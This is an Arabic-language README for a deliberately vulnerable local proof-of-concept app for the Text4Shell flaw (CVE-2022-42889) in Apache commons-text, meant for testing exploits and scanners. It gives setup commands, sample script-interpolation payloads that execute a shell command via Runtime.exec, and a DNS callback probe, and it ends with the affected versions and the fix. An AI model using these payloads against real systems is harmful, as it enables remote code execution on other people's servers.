
تطبيق إثبات مفهوم لاختبار CVE-2022-42889
هذا تطبيق ضعيف تم تطويره كإثبات مفهوم (Proof of Concept) للثغرة الأمنية CVE-2022-42889.
لتشغيل هذا ستحتاج إلى:
git clone https://github.com/securekomodo/text4shell-poc.git
cd text4shell-poc
mvn clean install
سيؤدي هذا إلى إنشاء مجلد ./target وداخل ذلك المجلد سيكون ملف JAR text4shell-poc-0.0.1-SNAPSHOT.jar
java -jar ./target/text4shell-poc-0.0.1-SNAPSHOT.jar
سيؤدي هذا إلى تشغيل خادم ويب على localhost لديك يستمع على المنفذ 8080 افتراضيًا
قم بالوصول إلى خادم الويب على http://localhost:8080/ ويجب أن ترى المخرجات التالية
Text4Shell POC Test -@securekomodo
Send payloads to /reflected?poc=yourpayload
OR Send payloads to /blind with payload as your userAgent
نماذج لحمولات الاستغلال
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/itworked')}
${dns:<burp collaborator host>)}
مُرمِّز URL الموصى به لعرض استغلال ناجح: https://www.urlencoder.org/.
بدلاً من ذلك، يمكنك استخدام Docker لتتمكن من تشغيل هذا الـ PoC:
git clone https://github.com/securekomodo/text4shell-poc.git
cd text4shell-poc
docker build --tag=text4shell-poc .
docker run -p 80:8080 text4shell-poc
http://localhost/
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
${dns:<burp collaborator host>)}
مُرمِّز URL الموصى به لعرض استغلال ناجح: https://www.urlencoder.org/.
بدلاً من ذلك، يمكنك التحقق من فعالية أدوات الفحص مثل text4shell-scan
لكي يكون كودك ضعيفًا، يجب أن:
commons-text ابتداءً من الإصدار 1.5.0 وحتى (وليس بما في ذلك) 1.10.0الإصلاح لهذه الثغرة هو تحديث نسخ commons-text لديك إلى الإصدارات 1.10.0 أو أحدث.
Bryan Smith